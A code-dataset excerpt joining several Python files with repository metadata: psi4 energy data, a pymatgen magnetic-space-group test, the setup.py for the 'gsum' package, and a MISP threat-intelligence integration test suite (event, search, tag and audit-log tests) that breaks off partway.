DATA['NUCLEAR REPULSION ENERGY']['S22-22-monoA-CP'] = 271.438700576
DATA['NUCLEAR REPULSION ENERGY']['S22-22-monoB-CP'] = 271.346177694
|
psi4/psi4
|
psi4/share/psi4/databases/S22.py
|
Python
|
lgpl-3.0
| 43,408
|
[
"Psi4"
] |
c8345a26bbe331f1d7e0a4333e869444165bfb3c462efe879578588cba4b8ab9
|
#!/usr/bin/env python
import unittest
import numpy as np
from pymatgen.core.lattice import Lattice
from pymatgen.symmetry.maggroups import MagneticSpaceGroup
from pymatgen.symmetry.groups import SpaceGroup
from pymatgen.util.testing import PymatgenTest
__author__ = "Matthew Horton"
__copyright__ = "Copyright 2017, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Matthew Horton"
__email__ = "mkhorton@lbl.gov"
__status__ = "Beta"
__date__ = "Feb 2017"
class MagneticSpaceGroupTest(PymatgenTest):
def setUp(self):
self.msg_1 = MagneticSpaceGroup([70, 530])
self.msg_2 = MagneticSpaceGroup([62, 448])
self.msg_3 = MagneticSpaceGroup([20, 37])
self.msg_4 = MagneticSpaceGroup([2, 7], "c,1/4a+1/4b,-1/2a+1/2b;0,0,0")
def test_init(self):
# test init with the following space group:
# 71.538 (BNS number), I_cmmm (BNS label)
# 65.10.554 (same space group as above, OG number), C_Immm (OG label)
msg_from_bns_1 = MagneticSpaceGroup("I_cmmm")
msg_from_bns_2 = MagneticSpaceGroup([71, 538])
msg_from_og_1 = MagneticSpaceGroup.from_og("C_Immm")
msg_from_og_2 = MagneticSpaceGroup.from_og([65, 10, 554])
self.assertEqual(msg_from_bns_1, msg_from_bns_2)
self.assertEqual(msg_from_og_1, msg_from_og_2)
self.assertEqual(msg_from_bns_1, msg_from_og_1)
def test_crystal_system(self):
self.assertEqual(self.msg_1.crystal_system, "orthorhombic")
self.assertEqual(self.msg_2.crystal_system, "orthorhombic")
self.assertEqual(self.msg_3.crystal_system, "orthorhombic")
def test_sg_symbol(self):
self.assertEqual(self.msg_1.sg_symbol, "Fd'd'd")
self.assertEqual(self.msg_2.sg_symbol, "Pn'ma'")
self.assertEqual(self.msg_3.sg_symbol, "C_A222_1")
def test_is_compatible(self):
cubic = Lattice.cubic(1)
hexagonal = Lattice.hexagonal(1, 2)
rhom = Lattice.rhombohedral(3, 80)
tet = Lattice.tetragonal(1, 2)
ortho = Lattice.orthorhombic(1, 2, 3)
msg = MagneticSpaceGroup("Fm-3m")
self.assertTrue(msg.is_compatible(cubic))
self.assertFalse(msg.is_compatible(hexagonal))
msg = MagneticSpaceGroup("Pnma")
self.assertTrue(msg.is_compatible(cubic))
self.assertTrue(msg.is_compatible(tet))
self.assertTrue(msg.is_compatible(ortho))
self.assertFalse(msg.is_compatible(rhom))
self.assertFalse(msg.is_compatible(hexagonal))
msg = MagneticSpaceGroup("P2/c")
self.assertTrue(msg.is_compatible(cubic))
self.assertTrue(msg.is_compatible(tet))
self.assertTrue(msg.is_compatible(ortho))
self.assertFalse(msg.is_compatible(rhom))
self.assertFalse(msg.is_compatible(hexagonal))
msg = MagneticSpaceGroup("P-1")
self.assertTrue(msg.is_compatible(cubic))
self.assertTrue(msg.is_compatible(tet))
self.assertTrue(msg.is_compatible(ortho))
self.assertTrue(msg.is_compatible(rhom))
self.assertTrue(msg.is_compatible(hexagonal))
def test_symmetry_ops(self):
msg_1_symmops = "\n".join([str(op) for op in self.msg_1.symmetry_ops])
msg_1_symmops_ref = """x, y, z, +1
-x+3/4, -y+3/4, z, +1
-x, -y, -z, +1
x+1/4, y+1/4, -z, +1
x, -y+3/4, -z+3/4, -1
-x+3/4, y, -z+3/4, -1
-x, y+1/4, z+1/4, -1
x+1/4, -y, z+1/4, -1
x, y+1/2, z+1/2, +1
-x+3/4, -y+5/4, z+1/2, +1
-x, -y+1/2, -z+1/2, +1
x+1/4, y+3/4, -z+1/2, +1
x, -y+5/4, -z+5/4, -1
-x+3/4, y+1/2, -z+5/4, -1
-x, y+3/4, z+3/4, -1
x+1/4, -y+1/2, z+3/4, -1
x+1/2, y, z+1/2, +1
-x+5/4, -y+3/4, z+1/2, +1
-x+1/2, -y, -z+1/2, +1
x+3/4, y+1/4, -z+1/2, +1
x+1/2, -y+3/4, -z+5/4, -1
-x+5/4, y, -z+5/4, -1
-x+1/2, y+1/4, z+3/4, -1
x+3/4, -y, z+3/4, -1
x+1/2, y+1/2, z, +1
-x+5/4, -y+5/4, z, +1
-x+1/2, -y+1/2, -z, +1
x+3/4, y+3/4, -z, +1
x+1/2, -y+5/4, -z+3/4, -1
-x+5/4, y+1/2, -z+3/4, -1
-x+1/2, y+3/4, z+1/4, -1
x+3/4, -y+1/2, z+1/4, -1"""
msg_2_symmops = "\n".join([str(op) for op in self.msg_2.symmetry_ops])
msg_2_symmops_ref = """x, y, z, +1
-x, y+1/2, -z, +1
-x, -y, -z, +1
x, -y+1/2, z, +1
x+1/2, -y+1/2, -z+1/2, -1
-x+1/2, -y, z+1/2, -1
-x+1/2, y+1/2, z+1/2, -1
x+1/2, y, -z+1/2, -1"""
self.assertStrContentEqual(msg_2_symmops, msg_2_symmops_ref)
msg_3_symmops = "\n".join([str(op) for op in self.msg_3.symmetry_ops])
msg_3_symmops_ref = """x, y, z, +1
x, -y, -z, +1
-x, y, -z+1/2, +1
-x, -y, z+1/2, +1
x, y+1/2, z+1/2, -1
x+1/2, -y, -z+1/2, -1
-x+1/2, y, -z, -1
-x+1/2, -y, z, -1
x+1/2, y+1/2, z, +1
x+1/2, -y+1/2, -z, +1
-x+1/2, y+1/2, -z+1/2, +1
-x+1/2, -y+1/2, z+1/2, +1
x+1/2, y, z+1/2, -1
x, -y+1/2, -z+1/2, -1
-x, y+1/2, -z, -1
-x, -y+1/2, z, -1"""
self.assertEqual(msg_3_symmops, msg_3_symmops_ref)
msg_4_symmops = "\n".join([str(op) for op in self.msg_4.symmetry_ops])
msg_4_symmops_ref = """x, y, z, +1
-x, -y, -z, +1
x+1/2, y, z, -1
-x+1/2, -y, -z, -1"""
self.assertEqual(msg_4_symmops, msg_4_symmops_ref)
def test_equivalence_to_spacegroup(self):
# first 230 magnetic space groups have same symmetry operations
# as normal space groups, so should give same orbits
labels = ["Fm-3m", "Pnma", "P2/c", "P-1"]
points = [[0, 0, 0],
[0.5, 0, 0],
[0.11, 0.22, 0.33]]
for label in labels:
sg = SpaceGroup(label)
msg = MagneticSpaceGroup(label)
self.assertEqual(sg.crystal_system, msg.crystal_system)
for p in points:
pp_sg = np.array(sg.get_orbit(p))
pp_msg = np.array(msg.get_orbit(p, 0)[0]) # discarding magnetic moment information
pp_sg = pp_sg[np.lexsort(np.transpose(pp_sg)[::-1])] # sorting arrays so we can compare them
pp_msg = pp_msg[np.lexsort(np.transpose(pp_msg)[::-1])]
self.assertTrue(np.allclose(pp_sg, pp_msg))
def test_str(self):
msg = MagneticSpaceGroup([4, 11])
ref_string = """BNS: 4.11 P_b2_1
Operators: (1|0,0,0) (2y|0,1/2,0) (1|0,1/2,0)' (2y|0,0,0)'
Wyckoff Positions:
4e (x,y,z;mx,my,mz) (-x,y+1/2,-z;-mx,my,-mz) (x,y+1/2,z;-mx,-my,-mz)
(-x,y,-z;mx,-my,mz)
2d (1/2,y,1/2;mx,0,mz) (1/2,y+1/2,1/2;-mx,0,-mz)
2c (1/2,y,0;mx,0,mz) (1/2,y+1/2,0;-mx,0,-mz)
2b (0,y,1/2;mx,0,mz) (0,y+1/2,1/2;-mx,0,-mz)
2a (0,y,0;mx,0,mz) (0,y+1/2,0;-mx,0,-mz)
Alternative OG setting exists for this space group."""
ref_string_all = """BNS: 4.11 P_b2_1 OG: 3.7.14 P_2b2'
OG-BNS Transform: (a,2b,c;0,0,0)
Operators (BNS): (1|0,0,0) (2y|0,1/2,0) (1|0,1/2,0)' (2y|0,0,0)'
Wyckoff Positions (BNS):
4e (x,y,z;mx,my,mz) (-x,y+1/2,-z;-mx,my,-mz) (x,y+1/2,z;-mx,-my,-mz)
(-x,y,-z;mx,-my,mz)
2d (1/2,y,1/2;mx,0,mz) (1/2,y+1/2,1/2;-mx,0,-mz)
2c (1/2,y,0;mx,0,mz) (1/2,y+1/2,0;-mx,0,-mz)
2b (0,y,1/2;mx,0,mz) (0,y+1/2,1/2;-mx,0,-mz)
2a (0,y,0;mx,0,mz) (0,y+1/2,0;-mx,0,-mz)
Operators (OG): (1|0,0,0) (2y|0,1,0) (1|0,1,0)' (2y|0,0,0)'
Wyckoff Positions (OG): (1,0,0)+ (0,2,0)+ (0,0,1)+
4e (x,y,z;mx,my,mz) (-x,y+1,-z;-mx,my,-mz) (x,y+1,z;-mx,-my,-mz)
(-x,y,-z;mx,-my,mz)
2d (1/2,y,1/2;mx,0,mz) (-1/2,y+1,-1/2;-mx,0,-mz)
2c (1/2,y,0;mx,0,mz) (-1/2,y+1,0;-mx,0,-mz)
2b (0,y,1/2;mx,0,mz) (0,y+1,-1/2;-mx,0,-mz)
2a (0,y,0;mx,0,mz) (0,y+1,0;-mx,0,-mz)"""
self.assertStrContentEqual(str(msg), ref_string)
self.assertStrContentEqual(msg.data_str(), ref_string_all)
if __name__ == '__main__':
unittest.main()
|
mbkumar/pymatgen
|
pymatgen/symmetry/tests/test_maggroups.py
|
Python
|
mit
| 7,489
|
[
"pymatgen"
] |
b274a925fe606c74e2880bd260a07592686081bd0a576f87bac92c7d1a51fa92
|
from distutils.core import setup, Extension
# To build files manually, run: python setup.py build_ext --build-lib ./
# extensions = [Extension(
# name="gsum.cutils",
# sources=["gsum/cutils.pyx"],
# # depends=['gsl/gsl_linalg.h', 'gsl/gsl_permutation.h'],
# # libraries=[*cython_gsl.get_libraries()],
# # library_dirs=[cython_gsl.get_library_dir()],
# # include_dirs=[numpy.get_include(), cython_gsl.get_cython_include_dir()],
# )]
# Do not import packages if they are not yet installed via install_requires
try:
from Cython.Build import cythonize, build_ext
except ImportError:
# If we couldn't import Cython, use the normal setuptools
# and look for a pre-compiled .c file instead of a .pyx file
from setuptools.command.build_ext import build_ext
ext_modules = [Extension("gsum.cutils", ["gsum/cutils.c"])]
else:
# If we successfully imported Cython, look for a .pyx file
ext_modules = cythonize([Extension("gsum.cutils", ["gsum/cutils.pyx"])])
class CustomBuildExtCommand(build_ext):
"""build_ext command for use when numpy/cython_gsl headers are needed."""
def run(self):
# Import numpy here, only when headers are needed
import numpy
import cython_gsl
# Add the headers
self.libraries = cython_gsl.get_libraries()
self.library_dirs.append(cython_gsl.get_library_dir())
self.include_dirs.append(numpy.get_include())
self.include_dirs.append(cython_gsl.get_include())
self.include_dirs.append(cython_gsl.get_cython_include_dir())
# Call original build_ext command
build_ext.run(self)
setup(
name='gsum',
packages=['gsum'],
cmdclass={'build_ext': CustomBuildExtCommand},
ext_modules=ext_modules,
version='0.3',
description='A Bayesian model of series convergence using Gaussian sums',
author='Jordan Melendez',
author_email='jmelendez1992@gmail.com',
license='MIT',
url='https://github.com/buqeye/gsum.git',
download_url='',
keywords='EFT nuclear model gaussian process uncertainty quantification buqeyemodel buqeye',
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Mathematics',
'Topic :: Scientific/Engineering :: Physics'
],
install_requires=[
'Cython',
'CythonGSL',
'docrep',
'gsl',
'numpy>=1.12.0',
'pandas',
'scipy>=1.4.0',
'seaborn',
'statsmodels',
'matplotlib',
'scikit-learn',
]
)
|
jordan-melendez/buqeyemodel
|
setup.py
|
Python
|
mit
| 2,844
|
[
"Gaussian"
] |
acf9b5453088d5e2a0ffda9f3f674d10b79b239b661bb8bc1c1866931fcd0069
|
#!/usr/bin/env python3
import os
import json
import uuid
import subprocess
import unittest
from xml.etree import ElementTree as ET
from io import BytesIO
import urllib3 # type: ignore
import logging
logging.disable(logging.CRITICAL)
logger = logging.getLogger('pymisp')
from pymisp import PyMISP, MISPOrganisation, MISPUser, MISPRole, MISPSharingGroup, MISPEvent, MISPLog, MISPSighting, Distribution, ThreatLevel, Analysis, MISPEventReport, MISPServerError
# Load access information for env variables
url = "http://" + os.environ["HOST"]
key = os.environ["AUTH"]
urllib3.disable_warnings()
def create_simple_event():
event = MISPEvent()
event.info = 'This is a super simple test'
event.distribution = Distribution.your_organisation_only
event.threat_level_id = ThreatLevel.low
event.analysis = Analysis.completed
event.add_attribute('text', str(uuid.uuid4()))
return event
def check_response(response):
if isinstance(response, dict) and "errors" in response:
raise Exception(response["errors"])
return response
class MISPSetting:
def __init__(self, admin_connector: PyMISP, new_setting: dict):
self.admin_connector = admin_connector
self.new_setting = new_setting
def __enter__(self):
self.original = self.__run("modify", json.dumps(self.new_setting))
# Try to reset config cache
self.admin_connector.get_server_setting("MISP.live")
def __exit__(self, exc_type, exc_val, exc_tb):
self.__run("replace", self.original)
# Try to reset config cache
self.admin_connector.get_server_setting("MISP.live")
@staticmethod
def __run(command: str, data: str) -> str:
dir_path = os.path.dirname(os.path.realpath(__file__))
r = subprocess.run(["php", dir_path + "/modify_config.php", command, data], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if r.returncode != 0:
raise Exception([r.returncode, r.stdout, r.stderr])
return r.stdout.decode("utf-8")
class TestComprehensive(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.maxDiff = None
# Connect as admin
cls.admin_misp_connector = PyMISP(url, key, ssl=False, debug=False)
cls.admin_misp_connector.set_server_setting('debug', 1, force=True)
# Creates an org
organisation = MISPOrganisation()
organisation.name = 'Test Org'
cls.test_org = cls.admin_misp_connector.add_organisation(organisation, pythonify=True)
# Set the default role (id 3 on the VM)
cls.admin_misp_connector.set_default_role(3)
# Creates a user
user = MISPUser()
user.email = 'testusr@user.local'
user.org_id = cls.test_org.id
cls.test_usr = cls.admin_misp_connector.add_user(user, pythonify=True)
cls.user_misp_connector = PyMISP(url, cls.test_usr.authkey, ssl=False, debug=True)
@classmethod
def tearDownClass(cls):
# Delete user
cls.admin_misp_connector.delete_user(cls.test_usr)
# Delete org
cls.admin_misp_connector.delete_organisation(cls.test_org)
def setUp(self):
self.user_misp_connector.global_pythonify = True
self.admin_misp_connector.global_pythonify = True
def test_search_index(self):
# Search all events
index = self.user_misp_connector.search_index()
self.assertGreater(len(index), 0)
# Search published
index_published = self.user_misp_connector.search_index(published=True)
self.assertEqual(len(index_published), 0, "No event should be published.")
# Create test event
event = create_simple_event()
event = self.user_misp_connector.add_event(event)
check_response(event)
# Search by org name
index_org = self.user_misp_connector.search_index(org="Test Org")
self.assertGreater(len(index_org), 0)
# Search by org name with different case
index_org_lower = self.user_misp_connector.search_index(org="test org")
self.assertGreater(len(index_org_lower), 0)
# Search by org uuid
index_org_uuid = self.user_misp_connector.search_index(org=self.test_org.uuid)
self.assertGreater(len(index_org_uuid), 0)
# Search by org ID
index_org_id = self.user_misp_connector.search_index(org=self.test_org.id)
self.assertGreater(len(index_org_id), 0)
self.assertEqual(len(index_org), len(index_org_lower))
self.assertEqual(len(index_org), len(index_org_uuid))
self.assertEqual(len(index_org), len(index_org_id))
self.user_misp_connector.delete_event(event)
def test_search_index_by_info(self):
event = create_simple_event()
event.info = uuid.uuid4()
# No event should exists
index = self.user_misp_connector.search_index(eventinfo=event.info)
self.assertEqual(len(index), 0, "No event should exists")
event = self.user_misp_connector.add_event(event)
check_response(event)
# One event should exists
index = self.user_misp_connector.search_index(eventinfo=event.info)
self.assertEqual(len(index), 1)
self.assertEqual(index[0].uuid, event.uuid)
index = self.user_misp_connector.search_index(eventinfo="!" + str(event.info))
for index_event in index:
self.assertNotEqual(event.uuid, index_event.uuid, index)
self.user_misp_connector.delete_event(event)
def test_search_index_by_all(self):
event = create_simple_event()
index = self.user_misp_connector.search_index(all=event.attributes[0].value)
self.assertEqual(len(index), 0, "No event should exists")
event = self.user_misp_connector.add_event(event)
check_response(event)
index = self.user_misp_connector.search_index(all=event.attributes[0].value)
self.assertEqual(len(index), 1, "One event should exists")
self.assertEqual(index[0].uuid, event.uuid)
index = self.user_misp_connector.search_index(all=event.attributes[0].value.upper())
self.assertEqual(len(index), 1, "One event should exists")
self.assertEqual(index[0].uuid, event.uuid)
self.user_misp_connector.delete_event(event)
def test_search_index_by_attribute(self):
event = create_simple_event()
index = self.user_misp_connector.search_index(attribute=event.attributes[0].value)
self.assertEqual(len(index), 0, "No event should exists")
event = self.user_misp_connector.add_event(event)
check_response(event)
index = self.user_misp_connector.search_index(attribute=event.attributes[0].value)
self.assertEqual(len(index), 1, "One event should exists")
self.assertEqual(index[0].uuid, event.uuid)
index = self.user_misp_connector.search_index(attribute=event.attributes[0].value.upper())
self.assertEqual(len(index), 1, "One event should exists")
self.assertEqual(index[0].uuid, event.uuid)
self.user_misp_connector.delete_event(event)
def test_search_index_by_tag(self):
tags = self.user_misp_connector.search_tags("tlp:red", True)
index = self.user_misp_connector.search_index(tags="tlp:red")
self.assertEqual(len(index), 0, "No event should exists")
index = self.user_misp_connector.search_index(tags=tags[0].id)
self.assertEqual(len(index), 0, "No event should exists")
event = create_simple_event()
event.add_tag("tlp:red")
event = self.user_misp_connector.add_event(event)
check_response(event)
index = self.user_misp_connector.search_index(tags="tlp:red")
self.assertEqual(len(index), 1, "One event should exists")
index = self.user_misp_connector.search_index(tags="tlp:red|not_exists")
self.assertEqual(len(index), 1, "One event should exists")
index = self.user_misp_connector.search_index(tags=["tlp:red", "not_exists"])
self.assertEqual(len(index), 1, "One event should exists")
index = self.user_misp_connector.search_index(tags=tags[0].id)
self.assertEqual(len(index), 1, "One event should exists")
index = self.user_misp_connector.search_index(tags="!tlp:red")
for index_event in index:
self.assertNotEqual(event.uuid, index_event.uuid, index)
index = self.user_misp_connector.search_index(tags="!" + str(tags[0].id))
for index_event in index:
self.assertNotEqual(event.uuid, index_event.uuid, index)
self.user_misp_connector.delete_event(event)
def test_search_index_by_email(self):
index = self.user_misp_connector.search_index(email=self.test_usr.email)
self.assertEqual(len(index), 0, index)
event = create_simple_event()
event = self.user_misp_connector.add_event(event)
check_response(event)
index = self.user_misp_connector.search_index(email=self.test_usr.email)
self.assertEqual(len(index), 1, "One event should exists")
self.user_misp_connector.delete_event(event)
def test_search_index_by_email_admin(self):
index = self.admin_misp_connector.search_index(email="no_existing_exmail@example.com")
self.assertEqual(len(index), 0, index)
index = self.admin_misp_connector.search_index(email=self.test_usr.email)
self.assertEqual(len(index), 0, index)
event = create_simple_event()
event = self.user_misp_connector.add_event(event)
check_response(event)
index = self.admin_misp_connector.search_index(email=self.test_usr.email)
self.assertEqual(len(index), 1, index)
# Search by partial match
index = self.admin_misp_connector.search_index(email="testusr@user")
self.assertEqual(len(index), 1, index)
self.user_misp_connector.delete_event(event)
def test_search_index_minimal(self):
# pythonify is not supported for minimal results
self.user_misp_connector.global_pythonify = False
minimal = self.user_misp_connector.search_index(minimal=True)
self.assertGreater(len(minimal), 0)
minimal_event = minimal[0]
self.assertIn("id", minimal_event)
self.assertIn("timestamp", minimal_event)
self.assertIn("sighting_timestamp", minimal_event)
self.assertIn("published", minimal_event)
self.assertIn("uuid", minimal_event)
self.assertIn("orgc_uuid", minimal_event)
for event in minimal:
self.assertFalse(event["published"], "No event should be published.")
def test_search_index_minimal_published(self):
# pythonify is not supported for minimal results
self.user_misp_connector.global_pythonify = False
index = self.user_misp_connector.search_index(minimal=True, published=True)
self.assertEqual(len(index), 0, "No event should be published.")
index = self.user_misp_connector.search_index(minimal=True)
not_published = self.user_misp_connector.search_index(minimal=True, published=0)
both_2 = self.user_misp_connector.search_index(minimal=True, published=2)
both_array = self.user_misp_connector.search_index(minimal=True, published=[0, 1])
self.assertEqual(len(index), len(not_published))
self.assertEqual(len(index), len(both_2))
self.assertEqual(len(index), len(both_array))
def test_search_index_minimal_by_org(self):
# pythonify is not supported for minimal results
self.user_misp_connector.global_pythonify = False
# Create test event
event = create_simple_event()
event = self.user_misp_connector.add_event(event, pythonify=True)
check_response(event)
# Search by org name
minimal_org = self.user_misp_connector.search_index(minimal=True, org="Test Org")
self.assertGreater(len(minimal_org), 0)
for event in minimal_org:
self.assertEqual(event["orgc_uuid"], self.test_org.uuid)
# Search by org name with different case
minimal_org_lower = self.user_misp_connector.search_index(minimal=True, org="test org")
self.assertGreater(len(minimal_org), 0)
for event in minimal_org:
self.assertEqual(event["orgc_uuid"], self.test_org.uuid)
# Search by non exists org name
minimal_org_non_existing = self.user_misp_connector.search_index(minimal=True, org="Test Org that doesn't exists")
self.assertEqual(len(minimal_org_non_existing), 0)
# Search by org uuid
minimal_org_uuid = self.user_misp_connector.search_index(minimal=True, org=self.test_org.uuid)
self.assertGreater(len(minimal_org), 0)
for event in minimal_org:
self.assertEqual(event["orgc_uuid"], self.test_org.uuid)
# Search by non existing uuid
minimal_org_uuid_non_existing = self.user_misp_connector.search_index(minimal=True, org=uuid.uuid4())
self.assertEqual(len(minimal_org_uuid_non_existing), 0)
# Search by org ID
minimal_org_id = self.user_misp_connector.search_index(minimal=True, org=self.test_org.id)
self.assertGreater(len(minimal_org), 0)
for event in minimal_org:
self.assertEqual(event["orgc_uuid"], self.test_org.uuid)
self.assertEqual(len(minimal_org), len(minimal_org_lower))
self.assertEqual(len(minimal_org), len(minimal_org_uuid))
self.assertEqual(len(minimal_org), len(minimal_org_id))
# Search not by org
minimal_org_not = self.user_misp_connector.search_index(minimal=True, org="!Test Org")
for event in minimal_org_not:
self.assertNotEqual(event["orgc_uuid"], self.test_org.uuid)
minimal_org_lower_not = self.user_misp_connector.search_index(minimal=True, org="!test org")
for event in minimal_org_lower_not:
self.assertNotEqual(event["orgc_uuid"], self.test_org.uuid)
minimal_org_uuid_not = self.user_misp_connector.search_index(minimal=True, org="!" + self.test_org.uuid)
for event in minimal_org_uuid_not:
self.assertNotEqual(event["orgc_uuid"], self.test_org.uuid)
minimal_org_id_not = self.user_misp_connector.search_index(minimal=True, org="!" + self.test_org.id)
for event in minimal_org_id_not:
self.assertNotEqual(event["orgc_uuid"], self.test_org.uuid)
self.assertEqual(len(minimal_org_not), len(minimal_org_lower_not))
self.assertEqual(len(minimal_org_not), len(minimal_org_uuid_not))
self.assertEqual(len(minimal_org_not), len(minimal_org_id_not))
self.user_misp_connector.delete_event(event)
def test_delete_event_blocklist(self):
check_response(self.admin_misp_connector.set_server_setting('MISP.enableEventBlocklisting', 1))
# Create test event
event = create_simple_event()
event = self.user_misp_connector.add_event(event)
check_response(event)
# Delete event
check_response(self.user_misp_connector.delete_event(event))
check_response(self.admin_misp_connector.set_server_setting('MISP.enableEventBlocklisting', 0))
def test_deleted_attributes(self):
# Create test event
event = create_simple_event()
event.add_attribute('text', "deleted", deleted=True)
event.add_attribute('text', "not-deleted")
event = self.user_misp_connector.add_event(event)
check_response(event)
# Not deleted
fetched_event = self.user_misp_connector.get_event(event)
check_response(fetched_event)
self.assertEqual(len(fetched_event.attributes), 2, fetched_event)
# Not deleted
fetched_event = self.user_misp_connector.get_event(event, deleted=0)
check_response(fetched_event)
self.assertEqual(len(fetched_event.attributes), 2, fetched_event)
# Include deleted
fetched_event = self.user_misp_connector.get_event(event, deleted=1)
check_response(fetched_event)
self.assertEqual(len(fetched_event.attributes), 3, fetched_event)
# Deleted only
fetched_event = self.user_misp_connector.get_event(event, deleted=2)
check_response(fetched_event)
self.assertEqual(len(fetched_event.attributes), 1, fetched_event)
# Both
fetched_event = self.user_misp_connector.get_event(event, deleted=[0, 1])
check_response(fetched_event)
self.assertEqual(len(fetched_event.attributes), 3, fetched_event)
check_response(self.user_misp_connector.delete_event(event))
def test_view_event_exclude_local_tags(self):
event = create_simple_event()
event.add_tag({"name": "local", "local": 1})
event.add_tag({"name": "global", "local": 0})
event.attributes[0].add_tag({"name": "local", "local": 1})
event.attributes[0].add_tag({"name": "global", "local": 0})
event = self.admin_misp_connector.add_event(event)
check_response(event)
event_with_local_tags = self.admin_misp_connector.get_event(event)
check_response(event_with_local_tags)
self.assertEqual(len(event_with_local_tags.tags), 2)
self.assertEqual(len(event_with_local_tags.attributes[0].tags), 2)
event_without_local_tags = self.admin_misp_connector._check_json_response(self.admin_misp_connector._prepare_request('GET', f'events/view/{event.id}/excludeLocalTags:1'))
check_response(event_without_local_tags)
self.assertEqual(event_without_local_tags["Event"]["Tag"][0]["local"], 0, event_without_local_tags)
self.assertEqual(event_without_local_tags["Event"]["Attribute"][0]["Tag"][0]["local"], 0, event_without_local_tags)
check_response(self.admin_misp_connector.delete_event(event))
def test_publish_alert_filter(self):
check_response(self.admin_misp_connector.set_server_setting('MISP.background_jobs', 0, force=True))
first = create_simple_event()
first.add_tag('test_publish_filter')
first.threat_level_id = ThreatLevel.medium
second = create_simple_event()
second.add_tag('test_publish_filter')
second.threat_level_id = ThreatLevel.high
third = create_simple_event()
third.add_tag('test_publish_filter')
third.threat_level_id = ThreatLevel.low
four = create_simple_event()
four.threat_level_id = ThreatLevel.high
try:
# Enable autoalert on admin
self.admin_misp_connector._current_user.autoalert = True
check_response(self.admin_misp_connector.update_user(self.admin_misp_connector._current_user))
# Set publish_alert_filter tag to `test_publish_filter`
setting_value = {'AND': {'Tag.name': 'test_publish_filter', 'ThreatLevel.name': ['High', 'Medium']}}
check_response(self.admin_misp_connector.set_user_setting('publish_alert_filter', setting_value))
# Add events
first = check_response(self.admin_misp_connector.add_event(first))
second = check_response(self.admin_misp_connector.add_event(second))
third = check_response(self.admin_misp_connector.add_event(third))
four = check_response(self.admin_misp_connector.add_event(four))
# Publish events
for event in (first, second, third, four):
check_response(self.admin_misp_connector.publish(event, alert=True))
# Email notification should be send just to first event
mail_logs = self.admin_misp_connector.search_logs(model='User', action='email')
log_titles = [log.title for log in mail_logs]
self.assertIn('Email to admin@admin.test sent, titled "[ORGNAME MISP] Event ' + str(first.id) + ' - Medium - TLP:AMBER".', log_titles)
self.assertIn('Email to admin@admin.test sent, titled "[ORGNAME MISP] Event ' + str(second.id) + ' - High - TLP:AMBER".', log_titles)
self.assertNotIn('Email to admin@admin.test sent, titled "[ORGNAME MISP] Event ' + str(third.id) + ' - Low - TLP:AMBER".', log_titles)
self.assertNotIn('Email to admin@admin.test sent, titled "[ORGNAME MISP] Event ' + str(four.id) + ' - High - TLP:AMBER".', log_titles)
finally:
# Disable autoalert
self.admin_misp_connector._current_user.autoalert = False
check_response(self.admin_misp_connector.update_user(self.admin_misp_connector._current_user))
# Delete filter
self.admin_misp_connector.delete_user_setting('publish_alert_filter')
# Reenable background jobs
check_response(self.admin_misp_connector.set_server_setting('MISP.background_jobs', 1, force=True))
# Delete events
for event in (first, second, third, four):
check_response(self.admin_misp_connector.delete_event(event))
def test_remove_orphaned_correlations(self):
result = self.admin_misp_connector._check_json_response(self.admin_misp_connector._prepare_request('GET', 'servers/removeOrphanedCorrelations'))
check_response(result)
self.assertIn("message", result)
def test_restsearch_event_by_tags(self):
first = create_simple_event()
first.add_tag('test_search_tag')
first.add_tag('test_search_tag_third')
first.add_tag('test_search_tag_both')
first = self.admin_misp_connector.add_event(first)
check_response(first)
second = create_simple_event()
second.add_tag('test_search_tag_second')
second.add_tag('test_search_tag_both')
second = self.admin_misp_connector.add_event(second)
check_response(second)
search_result = self.admin_misp_connector.search(metadata=True, tags=["non_exists_tag"])
self.assertEqual(0, len(search_result))
search_result = self.admin_misp_connector.search(metadata=True, tags=["test_search_tag"])
self.assertEqual(1, len(search_result))
self.assertEqual(first.id, search_result[0].id)
search_result = self.admin_misp_connector.search(metadata=True, tags="test_search_tag")
self.assertEqual(1, len(search_result))
self.assertEqual(first.id, search_result[0].id)
# Like style match
search_result = self.admin_misp_connector.search(metadata=True, tags=["test_search_tag%"])
self.assertEqual(2, len(search_result))
search_result = self.admin_misp_connector.search(metadata=True, tags=["test_search_tag_second"])
self.assertEqual(1, len(search_result))
self.assertEqual(second.id, search_result[0].id)
search_result = self.admin_misp_connector.search(metadata=True, tags=["!test_search_tag"])
search_result_ids = [event.id for event in search_result]
self.assertNotIn(first.id, search_result_ids)
self.assertIn(second.id, search_result_ids)
search_result = self.admin_misp_connector.search(metadata=True, tags={"NOT": ["test_search_tag"]})
search_result_ids = [event.id for event in search_result]
self.assertNotIn(first.id, search_result_ids)
self.assertIn(second.id, search_result_ids)
search_result = self.admin_misp_connector.search(metadata=True, tags={"NOT": "test_search_tag"})
search_result_ids = [event.id for event in search_result]
self.assertNotIn(first.id, search_result_ids)
self.assertIn(second.id, search_result_ids)
search_result = self.admin_misp_connector.search(metadata=True, tags=["test_search_tag", "test_search_tag_second"])
self.assertEqual(2, len(search_result))
search_result = self.admin_misp_connector.search(metadata=True, tags={"AND": ["test_search_tag", "test_search_tag_third"]})
self.assertEqual(1, len(search_result))
self.assertEqual(first.id, search_result[0].id)
search_result = self.admin_misp_connector.search(metadata=True, tags={"AND": ["test_search_tag", "test_search_tag_both"]})
search_result_ids = [event.id for event in search_result]
self.assertEqual(1, len(search_result_ids))
self.assertIn(first.id, search_result_ids)
check_response(self.admin_misp_connector.delete_event(first))
check_response(self.admin_misp_connector.delete_event(second))
def test_log_new_audit(self):
check_response(self.admin_misp_connector.set_server_setting('MISP.log_new_audit', 1, force=True))
event = create_simple_event()
event.add_tag('test_log_new_audit_tag')
event = check_response(self.admin_misp_connector.add_event(event))
check_response(self.admin_misp_connector.delete_event(event))
check_response(self.admin_misp_connector.set_server_setting('MISP.log_new_audit', 0, force=True))
audit_logs = self.admin_misp_connector._check_json_response(self.admin_misp_connector._prepare_request('GET', 'admin/audit_logs/index'))
check_response(audit_logs)
self.assertGreater(len(audit_logs), 0)
def test_add_tag_to_attachment(self):
event = create_simple_event()
with open(__file__, 'rb') as f:
